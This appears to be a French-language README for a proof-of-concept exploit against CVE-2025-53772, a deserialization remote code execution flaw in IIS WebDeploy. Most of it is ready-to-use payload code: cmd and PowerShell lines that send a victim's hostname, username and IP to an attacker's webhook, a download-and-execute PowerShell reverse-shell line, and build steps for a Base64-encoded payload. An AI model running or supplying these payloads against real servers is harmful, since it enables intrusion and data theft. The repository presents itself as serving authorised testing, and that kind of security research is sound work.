
Preuve de concept pour CVE-2025-53772, une vulnérabilité d'exécution de code à distance dans IIS WebDeploy via une désérialisation non sécurisée. Inclut une génération de charge utile personnalisable pour la collecte d'informations, l'exécution de commandes et les shells inversés.
Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-53772, une vulnérabilité d'exécution de code à distance (RCE) dans IIS WebDeploy via une désérialisation non sécurisée.
Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou dommage causé par ce logiciel. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
Modifiez la charge utile dans poc.cs aux lignes 18-19 pour spécifier l'action cible :
// Remplacez par votre URL de webhook et la charge utile souhaitée
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
Collecte d'informations (recommandée) :
set.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");
Exécution de commande simple :
set.Add("cmd.exe");
set.Add("/c calc.exe"); // Ouvre la calculatrice
Shell inversé (avancé) :
set.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");
L'action GitHub compilera automatiquement le PoC et générera la charge utile encodée en Base64 :


Si vous préférez compiler localement plutôt que d'utiliser GitHub Actions :
# Windows avec .NET Framework
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs
poc.exe > payload.txt
## Ou avec Visual Studio
csc poc.cs
poc.exe